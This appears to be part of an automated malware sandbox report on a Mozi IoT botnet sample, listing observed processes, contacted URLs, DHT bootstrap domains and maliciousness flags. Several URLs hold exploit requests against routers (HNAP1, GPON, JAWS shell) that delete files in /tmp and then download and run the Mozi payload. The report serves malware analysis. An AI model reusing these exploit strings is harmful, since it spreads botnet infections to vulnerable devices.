/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean

URLs

Name
IP
Malicious
http://68.233.196.110:80/HNAP1/
68.233.196.110
malicious
http://%s:%d/bin.sh;chmod
unknown
malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
34.117.124.80
malicious
http://104.17.98.63:80/HNAP1/
104.17.98.63
malicious
http://173.223.142.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
173.223.142.130
malicious
http://52.64.147.225:80/HNAP1/
52.64.147.225
malicious
http://85.153.79.234:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
85.153.79.234
malicious
http://104.73.19.166:80/HNAP1/
104.73.19.166
malicious
http://184.27.52.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
184.27.52.100
malicious
http://85.95.252.164:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
85.95.252.164
malicious
http://%s:%d/bin.sh
unknown
malicious
http://176.122.182.151:80/HNAP1/
176.122.182.151
malicious
http://172.252.124.171:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
172.252.124.171
malicious
http://190.166.164.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
190.166.164.18
malicious
http://52.201.62.234:80/HNAP1/
52.201.62.234
malicious
http://pastebin.ca)
unknown
clean
http://%s:%d/Mozi.a;chmod
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://%s:%d/Mozi.m;$
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean
http://127.0.0.1
unknown
clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
clean
http://www.alsa-project.org
unknown
clean
http://www.pastebin.ca/upload.php
unknown
clean
http://%s:%d/Mozi.m
unknown
clean
http://www.alsa-project.org/cardinfo-db/
unknown
clean
http://127.0.0.1sendcmd
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
clean
http://13.235.141.230:37215/ctrlt/DeviceUpgrade_1
13.235.141.230
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
clean
http://ipinfo.io/ip
unknown
clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
clean
http://www.pastebin.ca
unknown
clean
http://purenetworks.com/HNAP1/
unknown
clean
http://www.alsa-project.org/alsa-info.sh
unknown
clean
http://%s:%d/Mozi.m;
unknown
clean
http://www.alsa-project.org.
unknown
clean
http://HTTP/1.1
unknown
clean
http://%s:%d/Mozi.a;sh$
unknown
clean
http://www.pastebin.ca.
unknown
clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
clean
http://222.236.20.88:49152/soap.cgi?service=WANIPConn1
222.236.20.88
clean

Domains

Name
IP
Malicious
dht.transmissionbt.com
87.98.162.88
clean
bttracker.acc.umu.se
130.239.18.159
clean
router.bittorrent.com
67.215.246.10
clean
router.utorrent.com
82.221.103.244
clean
bttracker.debian.org
unknown
clean

IPs

IP
Domain
Country
Active
Malicious